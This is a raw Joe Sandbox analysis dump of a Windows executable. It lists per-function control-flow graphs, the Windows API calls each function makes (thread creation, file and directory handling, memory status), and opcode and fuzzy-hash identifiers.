                                              • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                              • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT ref: 00407817
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?), ref: 0040782D
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50), ref: 0040783E
                                                • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT ref: 00407847
                                                • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                              • String ID:
                                              • API String ID: 359084233-0
                                              • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                              • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                              • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                              • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                              • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                              • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 635176117-0
                                              • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                              • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                              • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                              • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID: ExecuteFile
                                              • API String ID: 1033339047-323923146
                                              • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                              • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                              • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                              • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@??3@memmove
                                              • String ID:
                                              • API String ID: 3828600508-0
                                              • Opcode ID: 2a1df2c838f774f5723b140544c26346904bf29780928bc3aea3ff829463cf7e
                                              • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                              • Opcode Fuzzy Hash: 2a1df2c838f774f5723b140544c26346904bf29780928bc3aea3ff829463cf7e
                                              • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                              • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                              • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                              • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                              APIs
                                                • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT ref: 0040ADD6
                                                • Part of subcall function 0040ADC3: memmove.MSVCRT ref: 0040ADF0
                                                • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT ref: 0040AE00
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040CAF2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040CC4A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$??2@ExceptionThrowmemmove
                                              • String ID:
                                              • API String ID: 4269121280-0
                                              • Opcode ID: b4709de1ce440f23b29a0467ae8f3e1c9749f8dd4dfeb424c3c7a10a23baf9b3
                                              • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                              • Opcode Fuzzy Hash: b4709de1ce440f23b29a0467ae8f3e1c9749f8dd4dfeb424c3c7a10a23baf9b3
                                              • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@H_prolog
                                              • String ID:
                                              • API String ID: 1329742358-0
                                              • Opcode ID: 9bf62e70a86b2daa707f33c5fec657fee0fc0e4427214617184cae491fdd6d85
                                              • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                              • Opcode Fuzzy Hash: 9bf62e70a86b2daa707f33c5fec657fee0fc0e4427214617184cae491fdd6d85
                                              • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@??3@
                                              • String ID:
                                              • API String ID: 1936579350-0
                                              • Opcode ID: 35698c06e785c0e27dab92e99477b030fbb2bea1ee5e00fe14fdbb6f72c2c7f4
                                              • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                              • Opcode Fuzzy Hash: 35698c06e785c0e27dab92e99477b030fbb2bea1ee5e00fe14fdbb6f72c2c7f4
                                              • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@??3@
                                              • String ID:
                                              • API String ID: 1936579350-0
                                              • Opcode ID: 48754dcb46d30000a161653d4b442f09f3969e34d9d7226318d7ba3c54d6dfdb
                                              • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                              • Opcode Fuzzy Hash: 48754dcb46d30000a161653d4b442f09f3969e34d9d7226318d7ba3c54d6dfdb
                                              • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                              • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                              • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                              • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                              APIs
                                              • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                              • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AllocExceptionStringThrow
                                              • String ID:
                                              • API String ID: 3773818493-0
                                              • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                              • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                              • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                              • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                              • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                              • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                              • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                              • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                              • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                              • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                              • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                              • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                              • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                              APIs
                                                • Part of subcall function 0040D985: FindCloseChangeNotification.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ChangeCloseCreateFileFindNotification
                                              • String ID:
                                              • API String ID: 727422849-0
                                              • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                              • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                              • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                              • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                              APIs
                                              • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                              • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                              • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                              • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                              APIs
                                              • _beginthreadex.MSVCRT ref: 00406552
                                                • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
